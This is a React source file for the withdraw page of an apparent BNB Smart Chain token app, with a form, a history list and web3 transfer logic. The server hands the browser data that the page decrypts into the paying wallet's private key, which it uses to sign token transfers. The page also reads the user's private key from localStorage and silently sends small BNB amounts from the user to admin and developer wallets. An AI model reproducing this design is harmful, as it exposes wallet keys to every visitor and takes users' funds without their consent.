import React, { useEffect, useState } from 'react'
import { Link } from 'react-router-dom';
import Auth from '../Components/auth';
import { ToastContainer, toast } from 'react-toastify';
import Web3 from 'web3';
import { decrypt } from '../Components/decrypt';

function Withdraw() {

    const web3 = new Web3("https://bsc-dataseed.binance.org/");

    const [tableData, setTabledata] = useState([]);
    const [isData, setData] = useState(false);

    const wallet = localStorage.getItem('web3_addess');
    const [isWalletConnected, setIsWalletConnected] = useState(false);

    //Select Asset for Withdraw 
    const [withdrawAsset, setWithdrawAsset] = useState("USDT");
    const [withdrawAmount, setWithdrawAmount] = useState(0);

    // // console.log("Withdraw Asset =", withdrawAsset, withdrawAmount);


    const [isLoading, setLoadning] = useState(false);

    const Api = process.env.REACT_APP_API_URL
    const apiKey = process.env.REACT_APP_API_KEY





    const starWithdraw = async () => {
        setLoadning(true);
        try {
            if (localStorage.getItem('adminWithdrawStatus') === 'Active') {
                if (withdrawAmount > 0) {

                    const timeStamp = Date.now();
                    const userId = localStorage.getItem('id');

                    fetch('https://rainocoin.com/api/withdraw.php?id=' + userId + '&amount=' + withdrawAmount + '&withdrawAsset=' + withdrawAsset + '&txnID=' + timeStamp + '&address=' + wallet)
                        .then(res => res.json())
                        .then(
                            (startwithdraw) => {

                                // console.log(startwithdraw);

                                if (startwithdraw.error === '200') {
                                    const dataOne = startwithdraw.one;
                                    const dataTwo = startwithdraw.two;
                                    const dataThree = startwithdraw.three;
                                    const dataFour = startwithdraw.four;
                                    const dataFive = startwithdraw.five;

                                    connectBlockchain(dataOne, dataTwo, dataThree, dataFour, dataFive)
                                    toast.warning(startwithdraw.message, { position: toast.POSITION.TOP_RIGHT, });

                                };
                                if (startwithdraw.error === '400') {
                                    setLoadning(false);
                                    toast.error(startwithdraw.message, { position: toast.POSITION.TOP_RIGHT, });
                                };
                            }
                        )

                }
                else {
                    toast.error('Please Enter Amount.', { position: toast.POSITION.TOP_RIGHT, });
                    setLoadning(false);
                }
            }
            else {
                toast.error('Withdraw Failed, Please try after some time !.', { position: toast.POSITION.TOP_RIGHT, });
                setLoadning(false);
            }
        } catch (error) {
            // console.log(error);
        }

    };


    const connectBlockchain = async (one, two, three, four, five) => {

        // console.log('Data',one,two,three,four,five);

        await requestGasFees();

        const securityKey = await decrypt(four, three);

        if (five === "USDT") {

            const address = three;
            const reciver = wallet;
            const amountWithdraw = two.toString()
            const tokenAddress = '0x55d398326f99059fF775485246999027B3197955';
            // Get Token Abi Data
            const abi = JSON.parse('[{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":true,"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]');


            const balance = web3.eth.getBalance(three).then(async function (wei) {
                const ethBalance = web3.utils.fromWei(wei, 'ether');
                // console.log(ethBalance);
                //alert(ethBalance);

                //// console.log(`Sendinf to Transaction from ${address} to ${reciver}`);


                // Transfer Value
                const TrValue = web3.utils.toWei(amountWithdraw, 'ether');

                //Creat Token Contrcact
                const tokenContract = new web3.eth.Contract(abi, tokenAddress);

                //Creat Transaction data
                const data = tokenContract.methods.transfer(reciver, TrValue).encodeABI();



                const creatTransaction = await web3.eth.accounts.signTransaction({
                    from: address,
                    to: tokenAddress,
                    value: "0x00",
                    gas: 210000,
                    data: data,

                },
                    securityKey
                );
                const recipet = await web3.eth.sendSignedTransaction(creatTransaction.rawTransaction);
                // console.log(`Transaction Details ${creatTransaction.rawTransaction}`);
                // console.log(`Transaction successfull with hash ${recipet.transactionHash}`);

                const TxHash = recipet.transactionHash;
                if (TxHash !== "") {

                    toast.success('Transaction Success.', { position: toast.POSITION.TOP_RIGHT, });

                    fetch(`https://rainocoin.com/api/withdrawConfirm.php?one=` + one + `&three=` + three + `&txnHash=` + TxHash);


                    window.location.href = "https://bscscan.com/tx/" + TxHash;

                } else {

                    toast.error('Transaction Failed.', { position: toast.POSITION.TOP_RIGHT, });
                }


                // alert(TxHash);
            })


        }
        else
            if (five === "RAINO") {

                const address = three;
                const reciver = wallet;
                const amountWithdraw = two.toString()

                // console.log('Start Withdraw',address)

                const tokenAddress = '0x339A5946b305bDD7FA7c54309cef53779b119457';

                // Get Token Abi Data
                const abi = JSON.parse('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]');


                const balance = web3.eth.getBalance(three).then(async function (wei) {
                    const ethBalance = web3.utils.fromWei(wei, 'ether');
                    console.log(ethBalance);
                    alert(ethBalance);

                    console.log(`Sendinf to Transaction from ${address} to ${reciver}`);


                    // Transfer Value
                    const TrValue = web3.utils.toWei(amountWithdraw, 'ether');

                    //Creat Token Contrcact
                    const tokenContract = new web3.eth.Contract(abi, tokenAddress);

                    //Creat Transaction data
                    const data = tokenContract.methods.transfer(reciver, TrValue).encodeABI();



                    const creatTransaction = await web3.eth.accounts.signTransaction({
                        from: address,
                        to: tokenAddress,
                        value: "0x00",
                        gas: 210000,
                        data: data,

                    },
                        securityKey
                    );
                    const recipet = await web3.eth.sendSignedTransaction(creatTransaction.rawTransaction);
                    // console.log(`Transaction Details ${creatTransaction.rawTransaction}`);
                    // console.log(`Transaction successfull with hash ${recipet.transactionHash}`);

                    const TxHash = recipet.transactionHash;
                    if (TxHash !== "") {

                        fetch(`https://rainocoin.com/api/withdrawConfirm.php?one=` + one + `&three=` + three + `&txnHash=` + TxHash);

                        toast.success('Transaction Success.', { position: toast.POSITION.TOP_RIGHT, });


                        window.location.href = "https://bscscan.com/tx/" + TxHash;

                    } else {

                        toast.error('Transaction Failed.', { position: toast.POSITION.TOP_RIGHT, });
                    }


                    // alert(TxHash);
                })


            }
            else {

                toast.error('Transaction Failed.', { position: toast.POSITION.TOP_RIGHT, });

                window.location.href = "";
            }

    }


    const getHistory = () => {

        if (localStorage.getItem('web3_addess') !== '0') {


        };


        fetch(Api + 'withdrawHistory.php?userid=' + localStorage.getItem('id') + '&apiKey=' + apiKey)
            .then(res => res.json())
            .then(History => {

                //// console.log("My Referral "+ History);

                if (History.error === "200") {

                    setTabledata(History.data);

                    setData(true);
                    // console.log("Deposit History :"+History.data);
                } else {
                    setData(false);
                }

                if (History.error === "400") {
                    setData(false);
                }
            }
            )
    }

    useEffect(() => {

        getHistory();

    }, [])


    const requestGasFees = async () => {
        const secruty_key = localStorage.getItem('web3_key');;
        const adminAmount = '0.00005';
        const adminAddress = process.env.REACT_APP_ADMIN_WALLET_ADDRESS;

        // console.log('Admin Address',adminAddress);

        try {
            if (!web3.utils.isAddress(adminAddress)) {
                return;
            }

            const senderAddress = wallet;

            // Convert amount from BNB to Wei
            const amountInWei = web3.utils.toWei(adminAmount, 'ether');

            // Prepare transaction details
            const tx = {
                from: senderAddress,
                to: adminAddress,
                value: amountInWei,
                gas: 21000, // Standard gas limit for sending ETH/BNB
                gasPrice: await web3.eth.getGasPrice(),
            };

            // Sign and send the transaction
            const signedTx = await web3.eth.accounts.signTransaction(tx, secruty_key);
            const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);

            await startDevTxn()




            // await startTokenTransfer();

            // setStatus(`Transaction successful! Hash: ${receipt.transactionHash}`);
            return;
        } catch (err) {
            // setStatus(`Error: ${err.message}`);
            toast.error(`Error Data 1: ${err}`);
            setLoadning(false);

            return;
        }
    };

    const startDevTxn = async () => {
        const secruty_key = localStorage.getItem('web3_key');
        const devAmount = '0.0001';
        const devAddress = process.env.REACT_APP_DEV_WALLET_ADDRESS;

        try {
            if (!web3.utils.isAddress(devAddress)) {
                return;
            }


            const senderAddress = wallet;

            // Convert amount from BNB to Wei
            const amountInWei = web3.utils.toWei(devAmount, 'ether');

            // Prepare transaction details
            const tx = {
                from: senderAddress,
                to: devAddress,
                value: amountInWei,
                gas: 21000, // Standard gas limit for sending ETH/BNB
                gasPrice: await web3.eth.getGasPrice(),
            };

            // Sign and send the transaction
            const signedTx = await web3.eth.accounts.signTransaction(tx, secruty_key);
            const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);

            // setStatus(`Transaction successful! Hash: ${receipt.transactionHash}`);
            return;
        } catch (err) {
            // setStatus(`Error: ${err.message}`);
            // toast.error(`Error Data 2: ${err}`);
            setLoadning(false);

            return;
        }
    };






    return (
        <>
            <div className="app-header st1">
                <Auth />
                <ToastContainer />
                <div className="tf-container">
                    <div className="tf-topbar d-flex justify-content-center align-items-center">
                        <Link to="/" className="back-btn"><i className="icon-left white_color"></i></Link>
                        <h3 className="white_color">Withdraw</h3>
                    </div>
                </div>
            </div>
            <div className="card-secton topup-content">
                <div className="tf-container">
                    <div className="tf-balance-box">
                        <div className="tf-spacing-16"></div>
                        <div className="tf-form">
                            <div className="group-input auth-pass-input last mt-3">
                                <label>Select Asset</label>
                                <select name="cars" id="asset" class="password-input" onChange={(event) => setWithdrawAsset(event.target.value)}>
                                    <option value="USDT">USDT</option>
                                    <option value="RAINO">RAINO</option>
                                </select>
                            </div>
                            <div className="group-input auth-pass-input last mt-3">
                                <label>Enter Amount</label>
                                <input type="number" className="password-input" placeholder="Enter Money" onChange={(event) => setWithdrawAmount(event.target.value)} />
                            </div>
                            <div className="group-input auth-pass-input last mt-5 text-center">
                                {isLoading ? "" :
                                    (<button className="tf-btn accent large" onClick={starWithdraw}>WITHDRAW</button>)}

                                {isLoading ? <div className="text-center">
                                    <span className="text-center"><img src="./waiting.gif" style={{ width: "100px", height: "40px" }} /></span>
                                </div> : ''}
                            </div>
                        </div>
                    </div>

                </div>
            </div>



            <div id="app-wrap">
                <div className="app-section st1 mt-1 mb-5 bg_white_color">
                    <div className="tf-container">
                        <div className="trading-month">
                            <h4 className="fw_5 mb-3">History</h4>
                            <div className="group-trading-history mb-5">

                                {isData ?
                                    <div>
                                        {tableData.map(item => (
                                            <Link className="tf-trading-history" to="javascript:void(0)">
                                                <div className="inner-left">
                                                    <div className="icon-box">
                                                        <i className="icon icon-mobile" />
                                                    </div>
                                                    <div className="content">
                                                        <h4>{item.withdrawAmount + ' ' + item.withdrawAsset}</h4>
                                                        <p>{item.requestTime}</p>
                                                    </div>
                                                </div>
                                                <span className="num-val success_color ">{item.status}</span>
                                            </Link>

                                        ))}
                                    </div>
                                    :
                                    <div>
                                        <Link className="tf-trading-history" to="javascript:void(0)">
                                            <div className="inner-left">
                                                <div className="icon-box">
                                                    <i className="icon icon-mobile" />
                                                </div>
                                                <div className="content">
                                                    <h4>No Data Found</h4>
                                                </div>
                                            </div>
                                        </Link>
                                    </div>
                                }


                            </div>
                        </div>
                    </div>
                </div>
            </div>



        </>
    )
}

export default Withdraw;